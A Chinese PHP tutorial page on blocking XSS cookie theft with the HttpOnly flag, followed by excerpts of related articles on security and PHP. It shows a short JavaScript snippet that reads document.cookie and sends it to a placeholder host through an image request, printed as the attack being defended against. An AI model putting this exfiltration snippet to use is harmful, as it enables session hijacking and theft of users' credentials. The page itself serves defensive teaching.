xss防御之php利用httponly防xss攻击_php实例

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

复制代码 代码如下:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

复制代码 代码如下:

//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过:

复制代码 代码如下:

header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!

时间: 2024-09-02 04:49:43

xss防御之php利用httponly防xss攻击_php实例的相关文章

xss防御之php利用httponly防xss攻击

 这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下 xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了...   如下js获取cookie信息:    代码如下: url=document.top.location.href; coo

linux下利用iptables防Ddos攻击配置

使用iptables 设定单个客户机的指定时间内发起最大连接数请求,超过限制的直接DROP  代码如下 复制代码 iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –set –name WEB iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 30 –hitcount 20 –rttl –name WEB

PHP利用imagick生成组合缩略图_php实例

先给大家炫下效果图,如果大家觉得还很满意,请继续往下阅读: 这里说的imagick 是 ImageMagick 在PHP下的扩展.使用pecl安装起来那叫一个轻松简单一条命令就搞定: 复制代码 代码如下: sudo pecl install imagick (扩展装好后还是要在php.ini中加上extension=imagick.so,然后记得重启apache或php-fpm服务.) 最近有个需求是要把多张图片组合起来生成缩略图,刚好用用这个强大的imagick扩展. 这个需求是要这样生成缩略

淘宝ip地址查询类分享(利用淘宝ip库)_php实例

淘宝公司提供了一个很好用的IP地理信息查询接口.在这里:http://ip.taobao.com/ 以下这个taobaoIPQuery类将极大的简化相关的信息查询. 复制代码 代码如下: <?php class taobaoIPQuery {     private $m_ip;    private $m_content;     public function __construct($ip) {        if (isset($ip)) {            $this->m_i

《XSS跨站脚本攻击剖析与防御》—第6章6.4节利用Flash进行XSS攻击剖析

6.4 利用Flash进行XSS攻击剖析 XSS跨站脚本攻击剖析与防御 利用嵌入Web页面中的Flash进行XSS有一个决定因素:allowScriptAccess属性.allowScriptAccess是使用或 下面是一个简单的示例: allowScriptAccess属性控制着Flash与HTML页面的通信,可选的值有3个: always:允许随时执行脚本操作 never:禁止所有脚本执行操作 samedomain:只有在Flash 应用程序来自与HTML页相同的域时才允许执行脚本操作 其属

JAVA 如何写 防XSS跨站脚本工具和sql注入的 过滤器

问题描述 JAVA如何写防XSS跨站脚本工具和sql注入的过滤器 解决方案 解决方案二:话说原来项目中都有专门的安全包,屏蔽这些解决方案三:HttpServletRequestWrapper你值得拥有解决方案四:引用2楼x19881216的回复: HttpServletRequestWrapper你值得拥有 那个我试了貌似只能过滤参数吧,我请求的连接是这样的/PORTAL/css/struts-virtdir/%3Cscript%3Ealert(4415)%3C/script%3E.do会弹出个

Laravel5中防止XSS跨站攻击的方法_php实例

本文实例讲述了Laravel5中防止XSS跨站攻击的方法.分享给大家供大家参考,具体如下: Laravel 5本身没有这个能力来防止xss跨站攻击了,但是这它可以使用Purifier 扩展包集成 HTMLPurifier 防止 XSS 跨站攻击. 1.安装 HTMLPurifier 是基于 PHP 编写的富文本 HTML 过滤器,通常我们可以使用它来防止 XSS 跨站攻击,更多关于 HTMLPurifier的详情请参考其官网:http://htmlpurifier.org/.Purifier 是

利用脚本注入漏洞攻击ReactJS应用程序

ReactJS是一款能够帮助开发者构建用户接口的热门JavaScript库.在它的帮助下,开发者可以构建出内容丰富的客户端或Web应用,并且提前加载内容以提供更好的用户体验. 从设计角度来看,只要你能够按照开发标准来使用ReactJS的话,它其实是非常安全的.但是在网络安全领域中,没有任何东西是绝对安全的,而错误的编程实践方式将导致类似脚本注入漏洞之类的问题产生,这些错误的编程方式包括: 1.利用用户提供的对象来创建React组件; 2.利用用户提供的href属性来配置标签,或利用其他可注入的属

DDoS终结者 测思科防DDoS攻击系统

DDoS(分布式拒绝服务)攻击是利用TCP/IP协议漏洞进行的一种简单而致命的网络攻击,由于TCP/IP协议的这种会话机制漏洞无法修改,因此缺少直接有效的防御手段.大量实例证明利用传统设备被动防御基本是徒劳的,而且现有防火墙设备还会因为有限的处理能力陷入瘫痪,成为网络运行瓶颈.另外,攻击过程中目标主机也必然陷入瘫痪. 国内已经有越来越多的网站(Discuz.IM286等)中招落马,因此本报评测员,协同本地xx电信运营商在重庆市建立的互联网交换中心(IXC),对思科Riverhead防DDoS攻击